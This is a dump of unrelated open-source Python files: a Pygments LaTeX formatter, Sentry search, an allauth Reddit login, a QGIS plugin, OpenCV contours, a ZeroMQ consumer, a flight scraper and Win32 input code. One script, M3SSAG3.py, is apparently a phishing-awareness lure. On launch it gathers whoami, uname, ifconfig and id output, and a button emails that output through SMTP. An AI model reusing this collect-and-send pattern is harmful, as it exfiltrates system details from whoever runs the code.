## Small explanation of the mess below :)
#
# The previous version of the LaTeX formatter just assigned a command to
# each token type defined in the current style. That obviously is
# problematic if the highlighted code is produced for a different style
# than the style commands themselves.
#
# This version works much like the HTML formatter which assigns multiple
# CSS classes to each <span> tag, from the most specific to the least
# specific token type, thus falling back to the parent token type if one
# is not defined. Here, the classes are there too and use the same short
# forms given in token.STANDARD_TYPES.
#
# Highlighted code now only uses one custom command, which by default is
# \PY and selectable by the commandprefix option (and in addition the
# escapes \PYZat, \PYZlb and \PYZrb which haven't been renamed for
# backwards compatibility purposes).
#
# \PY has two arguments: the classes, separated by +, and the text to
# render in that style. The classes are resolved into the respective
# style commands by magic, which serves to ignore unknown classes.
#
# The magic macros are:
# * \PY@it, \PY@bf, etc. are unconditionally wrapped around the text
# to render in \PY@do. Their definition determines the style.
# * \PY@reset resets \PY@it etc. to do nothing.
# * \PY@toks parses the list of classes, using magic inspired by the
# keyval package (but modified to use plusses instead of commas
# because fancyvrb redefines commas inside its environments).
# * \PY@tok processes one class, calling the \PY@tok@classname command
# if it exists.
# * \PY@tok@classname sets the \PY@it etc. to reflect the chosen style
# for its class.
# * \PY resets the style, parses the classnames and then calls \PY@do.
#
# Tip: to read this code, print it out in substituted form using e.g.
# >>> print STYLE_TEMPLATE % {'cp': 'PY'}
STYLE_TEMPLATE = r'''
\makeatletter
\def\%(cp)s@reset{\let\%(cp)s@it=\relax \let\%(cp)s@bf=\relax%%
\let\%(cp)s@ul=\relax \let\%(cp)s@tc=\relax%%
\let\%(cp)s@bc=\relax \let\%(cp)s@ff=\relax}
\def\%(cp)s@tok#1{\csname %(cp)s@tok@#1\endcsname}
\def\%(cp)s@toks#1+{\ifx\relax#1\empty\else%%
\%(cp)s@tok{#1}\expandafter\%(cp)s@toks\fi}
\def\%(cp)s@do#1{\%(cp)s@bc{\%(cp)s@tc{\%(cp)s@ul{%%
\%(cp)s@it{\%(cp)s@bf{\%(cp)s@ff{#1}}}}}}}
\def\%(cp)s#1#2{\%(cp)s@reset\%(cp)s@toks#1+\relax+\%(cp)s@do{#2}}
%(styles)s
\def\%(cp)sZbs{\char`\\}
\def\%(cp)sZus{\char`\_}
\def\%(cp)sZob{\char`\{}
\def\%(cp)sZcb{\char`\}}
\def\%(cp)sZca{\char`\^}
\def\%(cp)sZam{\char`\&}
\def\%(cp)sZlt{\char`\<}
\def\%(cp)sZgt{\char`\>}
\def\%(cp)sZsh{\char`\#}
\def\%(cp)sZpc{\char`\%%}
\def\%(cp)sZdl{\char`\$}
\def\%(cp)sZhy{\char`\-}
\def\%(cp)sZsq{\char`\'}
\def\%(cp)sZdq{\char`\"}
\def\%(cp)sZti{\char`\~}
%% for compatibility with earlier versions
\def\%(cp)sZat{@}
\def\%(cp)sZlb{[}
\def\%(cp)sZrb{]}
\makeatother
'''
def _get_ttype_name(ttype):
fname = STANDARD_TYPES.get(ttype)
if fname:
return fname
aname = ''
while fname is None:
aname = ttype[-1] + aname
ttype = ttype.parent
fname = STANDARD_TYPES.get(ttype)
return fname + aname
class LatexFormatter(Formatter):
r"""
Format tokens as LaTeX code. This needs the `fancyvrb` and `color`
standard packages.
Without the `full` option, code is formatted as one ``Verbatim``
environment, like this:
.. sourcecode:: latex
\begin{Verbatim}[commandchars=\\\{\}]
\PY{k}{def }\PY{n+nf}{foo}(\PY{n}{bar}):
\PY{k}{pass}
\end{Verbatim}
The special command used here (``\PY``) and all the other macros it needs
are output by the `get_style_defs` method.
With the `full` option, a complete LaTeX document is output, including
the command definitions in the preamble.
The `get_style_defs()` method of a `LatexFormatter` returns a string
containing ``\def`` commands defining the macros needed inside the
``Verbatim`` environments.
Additional options accepted:
`style`
The style to use, can be a string or a Style subclass (default:
``'default'``).
`full`
Tells the formatter to output a "full" document, i.e. a complete
self-contained document (default: ``False``).
`title`
If `full` is true, the title that should be used to caption the
document (default: ``''``).
`docclass`
If the `full` option is enabled, this is the document class to use
(default: ``'article'``).
`preamble`
If the `full` option is enabled, this can be further preamble commands,
e.g. ``\usepackage`` (default: ``''``).
`linenos`
If set to ``True``, output line numbers (default: ``False``).
`linenostart`
The line number for the first line (default: ``1``).
`linenostep`
If set to a number n > 1, only every nth line number is printed.
`verboptions`
Additional options given to the Verbatim environment (see the *fancyvrb*
docs for possible values) (default: ``''``).
`commandprefix`
The LaTeX commands used to produce colored output are constructed
using this prefix and some letters (default: ``'PY'``).
.. versionadded:: 0.7
.. versionchanged:: 0.10
The default is now ``'PY'`` instead of ``'C'``.
`texcomments`
If set to ``True``, enables LaTeX comment lines. That is, LaTex markup
in comment tokens is not escaped so that LaTeX can render it (default:
``False``).
.. versionadded:: 1.2
`mathescape`
If set to ``True``, enables LaTeX math mode escape in comments. That
is, ``'$...$'`` inside a comment will trigger math mode (default:
``False``).
.. versionadded:: 1.2
`escapeinside`
If set to a string of length 2, enables escaping to LaTeX. Text
delimited by these 2 characters is read as LaTeX code and
typeset accordingly. It has no effect in string literals. It has
no effect in comments if `texcomments` or `mathescape` is
set. (default: ``''``).
.. versionadded:: 2.0
"""
name = 'LaTeX'
aliases = ['latex', 'tex']
filenames = ['*.tex']
def __init__(self, **options):
Formatter.__init__(self, **options)
self.docclass = options.get('docclass', 'article')
self.preamble = options.get('preamble', '')
self.linenos = get_bool_opt(options, 'linenos', False)
self.linenostart = abs(get_int_opt(options, 'linenostart', 1))
self.linenostep = abs(get_int_opt(options, 'linenostep', 1))
self.verboptions = options.get('verboptions', '')
self.nobackground = get_bool_opt(options, 'nobackground', False)
self.commandprefix = options.get('commandprefix', 'PY')
self.texcomments = get_bool_opt(options, 'texcomments', False)
self.mathescape = get_bool_opt(options, 'mathescape', False)
self.escapeinside = options.get('escapeinside', '')
if len(self.escapeinside) == 2:
self.left = self.escapeinside[0]
self.right = self.escapeinside[1]
else:
self.escapeinside = ''
self._create_stylesheet()
def _create_stylesheet(self):
t2n = self.ttype2name = {Token: ''}
c2d = self.cmd2def = {}
cp = self.commandprefix
def rgbcolor(col):
if col:
return ','.join(['%.2f' %(int(col[i] + col[i + 1], 16) / 255.0)
for i in (0, 2, 4)])
else:
return '1,1,1'
for ttype, ndef in self.style:
name = _get_ttype_name(ttype)
cmndef = ''
if ndef['bold']:
cmndef += r'\let\$$@bf=\textbf'
if ndef['italic']:
cmndef += r'\let\$$@it=\textit'
if ndef['underline']:
cmndef += r'\let\$$@ul=\underline'
if ndef['roman']:
cmndef += r'\let\$$@ff=\textrm'
if ndef['sans']:
cmndef += r'\let\$$@ff=\textsf'
if ndef['mono']:
cmndef += r'\let\$$@ff=\textsf'
if ndef['color']:
cmndef += (r'\def\$$@tc##1{\textcolor[rgb]{%s}{##1}}' %
rgbcolor(ndef['color']))
if ndef['border']:
cmndef += (r'\def\$$@bc##1{\setlength{\fboxsep}{0pt}'
r'\fcolorbox[rgb]{%s}{%s}{\strut ##1}}' %
(rgbcolor(ndef['border']),
rgbcolor(ndef['bgcolor'])))
elif ndef['bgcolor']:
cmndef += (r'\def\$$@bc##1{\setlength{\fboxsep}{0pt}'
r'\colorbox[rgb]{%s}{\strut ##1}}' %
rgbcolor(ndef['bgcolor']))
if cmndef == '':
continue
cmndef = cmndef.replace('$$', cp)
t2n[ttype] = name
c2d[name] = cmndef
def get_style_defs(self, arg=''):
"""
Return the command sequences needed to define the commands
used to format text in the verbatim environment. ``arg`` is ignored.
"""
cp = self.commandprefix
styles = []
for name, definition in iteritems(self.cmd2def):
styles.append(r'\expandafter\def\csname %s@tok@%s\endcsname{%s}' %
(cp, name, definition))
return STYLE_TEMPLATE % {'cp': self.commandprefix,
'styles': '\n'.join(styles)}
def format_unencoded(self, tokensource, outfile):
# TODO: add support for background colors
t2n = self.ttype2name
cp = self.commandprefix
if self.full:
realoutfile = outfile
outfile = StringIO()
outfile.write(u'\\begin{Verbatim}[commandchars=\\\\\\{\\}')
if self.linenos:
start, step = self.linenostart, self.linenostep
outfile.write(u',numbers=left' +
(start and u',firstnumber=%d' % start or u'') +
(step and u',stepnumber=%d' % step or u''))
if self.mathescape or self.texcomments or self.escapeinside:
outfile.write(u',codes={\\catcode`\\$=3\\catcode`\\^=7\\catcode`\\_=8}')
if self.verboptions:
outfile.write(u',' + self.verboptions)
outfile.write(u']\n')
for ttype, value in tokensource:
if ttype in Token.Comment:
if self.texcomments:
# Try to guess comment starting lexeme and escape it ...
start = value[0:1]
for i in xrange(1, len(value)):
if start[0] != value[i]:
break
start += value[i]
value = value[len(start):]
start = escape_tex(start, self.commandprefix)
# ... but do not escape inside comment.
value = start + value
elif self.mathescape:
# Only escape parts not inside a math environment.
parts = value.split('$')
in_math = False
for i, part in enumerate(parts):
if not in_math:
parts[i] = escape_tex(part, self.commandprefix)
in_math = not in_math
value = '$'.join(parts)
elif self.escapeinside:
text = value
value = ''
while len(text) > 0:
a,sep1,text = text.partition(self.left)
if len(sep1) > 0:
b,sep2,text = text.partition(self.right)
if len(sep2) > 0:
value += escape_tex(a, self.commandprefix) + b
else:
value += escape_tex(a + sep1 + b, self.commandprefix)
else:
value = value + escape_tex(a, self.commandprefix)
else:
value = escape_tex(value, self.commandprefix)
elif ttype not in Token.Escape:
value = escape_tex(value, self.commandprefix)
styles = []
while ttype is not Token:
try:
styles.append(t2n[ttype])
except KeyError:
# not in current style
styles.append(_get_ttype_name(ttype))
ttype = ttype.parent
styleval = '+'.join(reversed(styles))
if styleval:
spl = value.split('\n')
for line in spl[:-1]:
if line:
outfile.write("\\%s{%s}{%s}" % (cp, styleval, line))
outfile.write('\n')
if spl[-1]:
outfile.write("\\%s{%s}{%s}" % (cp, styleval, spl[-1]))
else:
outfile.write(value)
outfile.write(u'\\end{Verbatim}\n')
if self.full:
realoutfile.write(DOC_TEMPLATE %
dict(docclass = self.docclass,
preamble = self.preamble,
title = self.title,
encoding = self.encoding or 'latin1',
styledefs = self.get_style_defs(),
code = outfile.getvalue()))
class LatexEmbeddedLexer(Lexer):
r"""
This lexer takes one lexer as argument, the lexer for the language
being formatted, and the left and right delimiters for escaped text.
First everything is scanned using the language lexer to obtain
strings and comments. All other consecutive tokens are merged and
the resulting text is scanned for escaped segments, which are given
the Token.Escape type. Finally text that is not escaped is scanned
again with the language lexer.
"""
def __init__(self, left, right, lang, **options):
self.left = left
self.right = right
self.lang = lang
Lexer.__init__(self, **options)
def get_tokens_unprocessed(self, text):
buf = ''
for i, t, v in self.lang.get_tokens_unprocessed(text):
if t in Token.Comment or t in Token.String:
if buf:
for x in self.get_tokens_aux(idx, buf):
yield x
buf = ''
yield i, t, v
else:
if not buf:
idx = i
buf += v
if buf:
for x in self.get_tokens_aux(idx, buf):
yield x
def get_tokens_aux(self, index, text):
while text:
a, sep1, text = text.partition(self.left)
if a:
for i, t, v in self.lang.get_tokens_unprocessed(a):
yield index + i, t, v
index += len(a)
if sep1:
b, sep2, text = text.partition(self.right)
if sep2:
yield index + len(sep1), Token.Escape, b
index += len(sep1) + len(b) + len(sep2)
else:
yield index, Token.Error, sep1
index += len(sep1)
text = b
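# --- Illustrative usage (not part of the original file) ---
# The standard pygments entry point renders source to LaTeX with this
# formatter; full=True wraps the output in DOC_TEMPLATE above:
#
#     from pygments import highlight
#     from pygments.lexers import PythonLexer
#     print(highlight('def foo():\n    pass\n', PythonLexer(),
#                     LatexFormatter(full=True)))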
# --- nicholasserra/sentry :: src/sentry/search/django/backend.py ---
"""
sentry.search.django.backend
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:copyright: (c) 2010-2014 by the Sentry Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
from __future__ import absolute_import
from django.db import router
from django.db.models import Q
from sentry.api.paginator import DateTimePaginator, Paginator
from sentry.search.base import ANY, SearchBackend
from sentry.search.django.constants import (
SORT_CLAUSES, SQLITE_SORT_CLAUSES, MYSQL_SORT_CLAUSES, MSSQL_SORT_CLAUSES,
MSSQL_ENGINES, ORACLE_SORT_CLAUSES
)
from sentry.utils.db import get_db_engine
class DjangoSearchBackend(SearchBackend):
def query(self, project, query=None, status=None, tags=None,
bookmarked_by=None, assigned_to=None, first_release=None,
sort_by='date', unassigned=None,
age_from=None, age_from_inclusive=True,
age_to=None, age_to_inclusive=True,
date_from=None, date_from_inclusive=True,
date_to=None, date_to_inclusive=True,
cursor=None, limit=100):
from sentry.models import Event, Group, GroupStatus
queryset = Group.objects.filter(project=project)
if query:
# TODO(dcramer): if we want to continue to support search on SQL
# we should at least optimize this in Postgres so that it does
# the query filter **after** the index filters, and restricts the
# result set
queryset = queryset.filter(
Q(message__icontains=query) |
Q(culprit__icontains=query)
)
if status is None:
queryset = queryset.exclude(
status__in=(
GroupStatus.PENDING_DELETION,
GroupStatus.DELETION_IN_PROGRESS,
GroupStatus.PENDING_MERGE,
)
)
else:
queryset = queryset.filter(status=status)
if bookmarked_by:
queryset = queryset.filter(
bookmark_set__project=project,
bookmark_set__user=bookmarked_by,
)
if assigned_to:
queryset = queryset.filter(
assignee_set__project=project,
assignee_set__user=assigned_to,
)
elif unassigned in (True, False):
queryset = queryset.filter(
assignee_set__isnull=unassigned,
)
if first_release:
queryset = queryset.filter(
first_release__project=project,
first_release__version=first_release,
)
if tags:
for k, v in tags.iteritems():
if v == ANY:
queryset = queryset.filter(
grouptag__project=project,
grouptag__key=k,
)
else:
queryset = queryset.filter(
grouptag__project=project,
grouptag__key=k,
grouptag__value=v,
)
queryset = queryset.distinct()
if age_from or age_to:
params = {}
if age_from:
if age_from_inclusive:
params['first_seen__gte'] = age_from
else:
params['first_seen__gt'] = age_from
if age_to:
if age_to_inclusive:
params['first_seen__lte'] = age_to
else:
params['first_seen__lt'] = age_to
queryset = queryset.filter(**params)
if date_from or date_to:
params = {
'project_id': project.id,
}
if date_from:
if date_from_inclusive:
params['datetime__gte'] = date_from
else:
params['datetime__gt'] = date_from
if date_to:
if date_to_inclusive:
params['datetime__lte'] = date_to
else:
params['datetime__lt'] = date_to
event_queryset = Event.objects.filter(**params)
# limit to the first 1000 results
group_ids = event_queryset.distinct().values_list(
'group_id',
flat=True
)[:1000]
# if Event is not on the primary database remove Django's
# implicit subquery by coercing to a list
base = router.db_for_read(Group)
using = router.db_for_read(Event)
if base != using:
group_ids = list(group_ids)
queryset = queryset.filter(
id__in=group_ids,
)
engine = get_db_engine('default')
if engine.startswith('sqlite'):
score_clause = SQLITE_SORT_CLAUSES[sort_by]
elif engine.startswith('mysql'):
score_clause = MYSQL_SORT_CLAUSES[sort_by]
elif engine.startswith('oracle'):
score_clause = ORACLE_SORT_CLAUSES[sort_by]
elif engine in MSSQL_ENGINES:
score_clause = MSSQL_SORT_CLAUSES[sort_by]
else:
score_clause = SORT_CLAUSES[sort_by]
if sort_by == 'tottime':
queryset = queryset.filter(time_spent_count__gt=0)
elif sort_by == 'avgtime':
queryset = queryset.filter(time_spent_count__gt=0)
queryset = queryset.extra(
select={'sort_value': score_clause},
)
# HACK: don't sort by the same column twice
if sort_by == 'date':
paginator_cls = DateTimePaginator
sort_clause = '-last_seen'
elif sort_by == 'priority':
paginator_cls = Paginator
sort_clause = '-score'
elif sort_by == 'new':
paginator_cls = DateTimePaginator
sort_clause = '-first_seen'
elif sort_by == 'freq':
paginator_cls = Paginator
sort_clause = '-times_seen'
else:
paginator_cls = Paginator
sort_clause = '-sort_value'
queryset = queryset.order_by(sort_clause)
paginator = paginator_cls(queryset, sort_clause)
return paginator.get_result(limit, cursor)
# --- lukeburden/django-allauth :: allauth/socialaccount/providers/reddit/views.py ---
import requests
from allauth.socialaccount import app_settings
from allauth.socialaccount.providers.oauth2.views import (
OAuth2Adapter,
OAuth2CallbackView,
OAuth2LoginView,
)
from .provider import RedditProvider
class RedditAdapter(OAuth2Adapter):
provider_id = RedditProvider.id
access_token_url = 'https://www.reddit.com/api/v1/access_token'
authorize_url = 'https://www.reddit.com/api/v1/authorize'
profile_url = 'https://oauth.reddit.com/api/v1/me'
basic_auth = True
settings = app_settings.PROVIDERS.get(provider_id, {})
# Allow custom User Agent to comply with reddit API limits
headers = {
'User-Agent': settings.get('USER_AGENT', 'django-allauth-header')}
def complete_login(self, request, app, token, **kwargs):
headers = {
"Authorization": "bearer " + token.token}
headers.update(self.headers)
extra_data = requests.get(self.profile_url, headers=headers)
# This only here because of weird response from the test suite
if isinstance(extra_data, list):
extra_data = extra_data[0]
return self.get_provider().sociallogin_from_response(
request,
extra_data.json()
)
oauth2_login = OAuth2LoginView.adapter_view(RedditAdapter)
oauth2_callback = OAuth2CallbackView.adapter_view(RedditAdapter)
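# --- Illustrative configuration (not part of the original file) ---
# The custom User-Agent read via app_settings.PROVIDERS above would be
# supplied from Django settings roughly like this (values are placeholders):
#
#     SOCIALACCOUNT_PROVIDERS = {
#         'reddit': {
#             'AUTH_PARAMS': {'duration': 'permanent'},
#             'USER_AGENT': 'django:myapp:1.0 (by /u/yourusername)',
#         },
#     }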
# --- Elfpkck/polygons_parallel_to_line :: pptl_provider.py ---
# -*- coding: utf-8 -*-
"""
/***************************************************************************
PolygonsParallelToLine
A QGIS plugin
This plugin rotates polygons so that they are parallel to a line
-------------------
begin : 2016-03-10
copyright : (C) 2016-2017 by Andrey Lekarev
email : [email protected]
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
"""
__author__ = 'Andrey Lekarev'
__date__ = '2016-03-10'
__copyright__ = '(C) 2016-2017 by Andrey Lekarev'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
import os.path
from PyQt4.QtGui import QIcon
from processing.core.AlgorithmProvider import AlgorithmProvider
from processing.core.ProcessingConfig import Setting, ProcessingConfig
from pptl_algorithm import PolygonsParallelToLineAlgorithm
class PolygonsParallelToLineProvider(AlgorithmProvider):
MY_SETTING = 'MY_SETTING'
def __init__(self):
AlgorithmProvider.__init__(self)
# Deactivate provider by default
self.activate = False
# Load algorithms
self.alglist = [PolygonsParallelToLineAlgorithm()]
for alg in self.alglist:
alg.provider = self
def initializeSettings(self):
"""In this method we add settings needed to configure our
provider.
"""
AlgorithmProvider.initializeSettings(self)
ProcessingConfig.addSetting(Setting('Example algorithms',
PolygonsParallelToLineProvider.MY_SETTING,
'Example setting', 'Default value'))
def unload(self):
"""Setting should be removed here, so they do not appear anymore
when the plugin is unloaded.
"""
AlgorithmProvider.unload(self)
ProcessingConfig.removeSetting(
PolygonsParallelToLineProvider.MY_SETTING)
def getName(self):
"""This is the name that will appear on the toolbox group.
It is also used to create the command line name of all the
algorithms from this provider.
"""
return 'Polygons parallel to line'
def getDescription(self):
"""This is the provired full name.
"""
return 'Polygons parallel to line'
def getIcon(self):
"""We return the default icon.
"""
# return AlgorithmProvider.getIcon(self)
path = os.path.join(os.path.dirname(__file__), "icons", "icon.png")
return QIcon(path)
def _loadAlgorithms(self):
"""Here we fill the list of algorithms in self.algs.
This method is called whenever the list of algorithms should
be updated. If the list of algorithms can change (for instance,
if it contains algorithms from user-defined scripts and a new
script might have been added), you should create the list again
here.
In this case, since the list is always the same, we assign from
the pre-made list. This assignment has to be done in this method
even if the list does not change, since the self.algs list is
cleared before calling this method.
"""
self.algs = self.alglist
# --- mentum/pictureflow :: pictureflow/vision/contour_detection.py ---
from pictureflow.core import Image, Node
import cv2
class ContourDetector(Node):
"""
Performs contour detection steps on an already masked binary image.
Args:
parent (Node): Parent image node
drop_threshold (Node): Minimum allowed contour area
Attributes:
Input Types: [ :py:class:`Image`, :py:class:`int` ]
Output Type: :py:class:`list`
"""
_input_types = [Image, int]
_output_type = list
def __init__(self, parent, drop_threshold, id='contour_detect'):
super().__init__(id, parent, drop_threshold)
def apply(self, item, threshold):
img = item.img_mat
img[img > 0] = 255
_, contours, _ = cv2.findContours(img, cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)
valid_contours = []
for contour in contours:
max_x = contour[:, :, 0].max()
min_x = contour[:, :, 0].min()
max_y = contour[:, :, 1].max()
min_y = contour[:, :, 1].min()
if (max_x - min_x) * (max_y - min_y) > threshold:
valid_contours.append(contour)
yield valid_contours
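# --- Illustrative sketch (not part of the original file) ---
# The same bounding-box area filter in plain OpenCV 3 / numpy, outside the
# pictureflow Node machinery (the threshold value is an assumption):
#
#     import cv2
#     import numpy as np
#     mask = np.zeros((100, 100), np.uint8)
#     cv2.rectangle(mask, (10, 10), (60, 60), 255, -1)   # one white blob
#     _, contours, _ = cv2.findContours(mask, cv2.RETR_LIST,
#                                       cv2.CHAIN_APPROX_SIMPLE)
#     big = [c for c in contours
#            if (c[:, :, 0].max() - c[:, :, 0].min()) *
#               (c[:, :, 1].max() - c[:, :, 1].min()) > 500]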
gsalvatori/tredify | lib/GIS.py | 1 | 1199 | import matplotlib.pyplot as plt
from mpl_toolkits.basemap import Basemap
class GIS:
def __init__(self,dict_):
self.coordinates = dict_["coordinates"]
self.type = dict_["type"]
# we set low resolution as default setting
self.map = Basemap(projection='merc',resolution='l')
def point(self):
self.map.drawcoastlines()
self.map.drawcountries()
self.map.fillcontinents(color = 'coral')
self.map.drawmapboundary()
x,y = self.map(self.coordinates[0],self.coordinates[1])
self.map.plot(x, y, 'bo', markersize=10)
plt.show()
def linestring(self):
self.map.drawcoastlines()
self.map.drawcountries()
self.map.fillcontinents(color = 'coral')
self.map.drawmapboundary()
        # GeoJSON LineString coordinates are a list of [lon, lat] positions,
        # so split them into separate lon/lat sequences before projecting.
        lons, lats = zip(*self.coordinates)
        x, y = self.map(lons, lats)
        self.map.plot(x, y, color="green", linewidth=1.0, linestyle="-")
plt.show()
def init(self):
if self.type == "Point":
self.point()
elif self.type == "LineString":
self.linestring()
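
# Minimal usage sketch (coordinates are illustrative; assumes Basemap is
# installed and a display is available):
#
#     gis = GIS({"type": "Point", "coordinates": [12.49, 41.89]})
#     gis.init()  # draws the point on a world map and shows it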
| gpl-3.0 | 189,024,367,770,067,700 | 23.469388 | 66 | 0.715596 | false | 3.035443 | false | false | false |
zalf-lsa/monica | installer/Hohenfinow2/python/run-consumer.py | 1 | 4052 | #!/usr/bin/python
# -*- coding: UTF-8
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/. */
# Authors:
# Michael Berg-Mohnicke <[email protected]>
#
# Maintainers:
# Currently maintained by the authors.
#
# This file has been created at the Institute of
# Landscape Systems Analysis at the ZALF.
# Copyright (C) Leibniz Centre for Agricultural Landscape Research (ZALF)
import sys
import csv
import os
import json
import zmq
#print "pyzmq version: ", zmq.pyzmq_version(), " zmq version: ", zmq.zmq_version()
import monica_io
#print "path to monica_io: ", monica_io.__file__
def run_consumer(path_to_output_dir = None, leave_after_finished_run = False, server = {"server": None, "port": None}, shared_id = None):
"collect data from workers"
config = {
"port": server["port"] if server["port"] else "7777",
"server": server["server"] if server["server"] else "localhost",
"shared_id": shared_id,
"out": path_to_output_dir if path_to_output_dir else os.path.join(os.path.dirname(__file__), 'out/'),
"leave_after_finished_run": leave_after_finished_run
}
if len(sys.argv) > 1 and __name__ == "__main__":
for arg in sys.argv[1:]:
k,v = arg.split("=")
if k in config:
if k == "leave_after_finished_run":
if (v == 'True' or v == 'true'):
config[k] = True
else:
config[k] = False
else:
config[k] = v
print "consumer config:", config
context = zmq.Context()
if config["shared_id"]:
socket = context.socket(zmq.DEALER)
socket.setsockopt(zmq.IDENTITY, config["shared_id"])
else:
socket = context.socket(zmq.PULL)
socket.connect("tcp://" + config["server"] + ":" + config["port"])
#socket.RCVTIMEO = 1000
leave = False
def process_message(msg):
        if not hasattr(process_message, "received_env_count"):
            process_message.received_env_count = 0
leave = False
if msg["type"] == "finish":
print "c: received finish message"
leave = True
else:
print "c: received work result ", process_message.received_env_count, " customId: ", str(msg.get("customId", ""))
process_message.received_env_count += 1
#with open("out/out-" + str(i) + ".csv", 'wb') as _:
with open(config["out"] + str(process_message.received_env_count) + ".csv", 'wb') as _:
writer = csv.writer(_, delimiter=",")
for data_ in msg.get("data", []):
results = data_.get("results", [])
orig_spec = data_.get("origSpec", "")
output_ids = data_.get("outputIds", [])
if len(results) > 0:
writer.writerow([orig_spec.replace("\"", "")])
for row in monica_io.write_output_header_rows(output_ids,
include_header_row=True,
include_units_row=True,
include_time_agg=False):
writer.writerow(row)
for row in monica_io.write_output(output_ids, results):
writer.writerow(row)
writer.writerow([])
if config["leave_after_finished_run"] == True :
leave = True
return leave
while not leave:
try:
msg = socket.recv_json(encoding="latin-1")
leave = process_message(msg)
        except:
            # ignore transient receive errors (e.g. timeouts) and keep polling
            continue
print "c: exiting run_consumer()"
#debug_file.close()
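
# Example invocation (argument names mirror the keys parsed in
# run_consumer(); the values are illustrative):
#
#     python run-consumer.py server=localhost port=7777 out=out/ \
#         leave_after_finished_run=true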
if __name__ == "__main__":
run_consumer()
| mpl-2.0 | -1,774,748,661,276,218,000 | 33.058824 | 137 | 0.51925 | false | 3.984267 | true | false | false |
sudo-KING/Misc-Tools | M3SSAG3.py | 1 | 1519 | ####WIP####
#!/usr/bin/python
from Tkinter import *
from tkMessageBox import *
import smtplib
import platform
import sys
import os
from email.mime.text import MIMEText
os.system('(whoami; uname -ar; ifconfig; pwd; id;) > me')
def answer():
showerror("Peekab000:", "We see you!, You are now on the Security Teams radar and maybe shouldn't have broken policy")
def callback():
if askyesno('Huh Oh!:', 'You have now been seen by the Security Team! Would you like to close me?'):
showwarning('Yes', 'NO! Go speak with the Security Team!')
else:
showinfo('No', "Smart answer, cause I wasn't going to close till you spoke to the Security Team anyways.")
def uname():
print platform.uname()
def givemeinfo():
    # write to the same 'me' file that maail() reads
    os.system('(whoami; uname -ar; ifconfig; pwd; id;) > me')
def maail():
fp = open('me', 'rb')
msg = MIMEText(fp.read())
fp.close()
msg['Subject'] = 'You Caught a Phish!'
msg['From'] = '<FROM-GOES-HERE>'
msg['To'] = '<TO-GOES-HERE>'
msg['cc'] = '<CC-GOES-HERE>'
s = smtplib.SMTP('<SMTP-GOES-HERE>')
s.sendmail('<FROM-GOES-HERE>', ['<TO-GOES-HERE>','<CC-GOES-HERE>'], msg.as_string())
s.quit()
Button(text='WHAT!?', command=answer).pack(fill=X)
Button(text='Give Me Options', command=callback).pack(fill=X)
Button(text='Informative', command=uname).pack(fill=X)
Button(text='I personally would not click this!', command=givemeinfo).pack(fill=X)
Button(text='You are not in trouble: Click me to email Security now', command=maail).pack(fill=X)
mainloop()
| lgpl-3.0 | 5,069,942,846,616,262,000 | 27.12963 | 122 | 0.670178 | false | 3.044088 | false | false | false |
daijia/fetch-flight | website/fetch_ctrip.py | 1 | 2256 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import util
from selenium import webdriver
from constant import Website
from setting.fetch_settings import URL_PARAMS
def dig_info(flight):
try:
info = flight.find_element_by_class_name('logo').text.split()
airline = info[0].strip() if len(info) >= 1 else ''
flight_no = info[1].strip() if len(info) >= 2 else ''
divs = flight.find_element_by_class_name('right').\
find_elements_by_tag_name('div')
from_time = divs[0].find_element_by_class_name('time').text
from_time_pair = [int(x) for x in from_time.split(':')]
from_airport = divs[1].text
divs = flight.find_element_by_class_name('left').\
find_elements_by_tag_name('div')
to_time = divs[0].find_element_by_class_name('time').text
to_time_pair = [int(x) for x in to_time.split(':')]
to_airport = divs[1].text
if to_time_pair[0] < from_time_pair[0]:
to_time_pair[0] += 24
price = flight.find_element_by_class_name('price').text[1:]
tmp_price = ''
for ch in price:
if ch.isdigit():
tmp_price += ch
else:
break
price = int(tmp_price)
return [airline, flight_no, from_airport, from_time,
from_time_pair, to_airport, to_time, to_time_pair, price]
except Exception as e:
util.log_error('CTRIP: ' + str(e))
return None
def fetch(period):
browser = webdriver.PhantomJS()
url = 'http://flights.ctrip.com/booking/%s-%s-day-1.html#DDate1=%s' % \
(URL_PARAMS[Website.CTRIP][period['from_city']],
URL_PARAMS[Website.CTRIP][period['to_city']],
period['date'])
browser.get(url)
util.scroll(browser)
block = util.fetch_one(browser, 'find_element_by_id', 'J_flightlist2')
if not block:
return []
flights = util.fetch_multi(block, 'find_elements_by_class_name',
'search_table_header')
format_flights = []
for flight in flights:
info = dig_info(flight)
if info:
format_flights.append(info)
browser.quit()
return util.deal(period, format_flights, Website.CTRIP, url)
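
# Usage sketch (hedged: valid city keys depend on URL_PARAMS in
# setting.fetch_settings; the values below are illustrative):
#
#     period = {'from_city': 'beijing', 'to_city': 'shanghai',
#               'date': '2015-10-01'}
#     flights = fetch(period)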
| mit | 6,369,214,236,859,696,000 | 35.983607 | 75 | 0.577571 | false | 3.255411 | false | false | false |
lmregus/Portfolio | python/design_patterns/env/lib/python3.7/site-packages/prompt_toolkit/input/win32.py | 1 | 16829 | from __future__ import unicode_literals
from ctypes import windll, pointer
from ctypes.wintypes import DWORD
from six.moves import range
from contextlib import contextmanager
from .ansi_escape_sequences import REVERSE_ANSI_SEQUENCES
from .base import Input
from prompt_toolkit.eventloop import get_event_loop
from prompt_toolkit.eventloop.win32 import wait_for_handles
from prompt_toolkit.key_binding.key_processor import KeyPress
from prompt_toolkit.keys import Keys
from prompt_toolkit.mouse_events import MouseEventType
from prompt_toolkit.win32_types import EventTypes, KEY_EVENT_RECORD, MOUSE_EVENT_RECORD, INPUT_RECORD, STD_INPUT_HANDLE
import msvcrt
import os
import sys
import six
__all__ = [
'Win32Input',
'ConsoleInputReader',
'raw_mode',
'cooked_mode',
'attach_win32_input',
'detach_win32_input',
]
class Win32Input(Input):
"""
`Input` class that reads from the Windows console.
"""
def __init__(self, stdin=None):
self.console_input_reader = ConsoleInputReader()
def attach(self, input_ready_callback):
"""
Return a context manager that makes this input active in the current
event loop.
"""
assert callable(input_ready_callback)
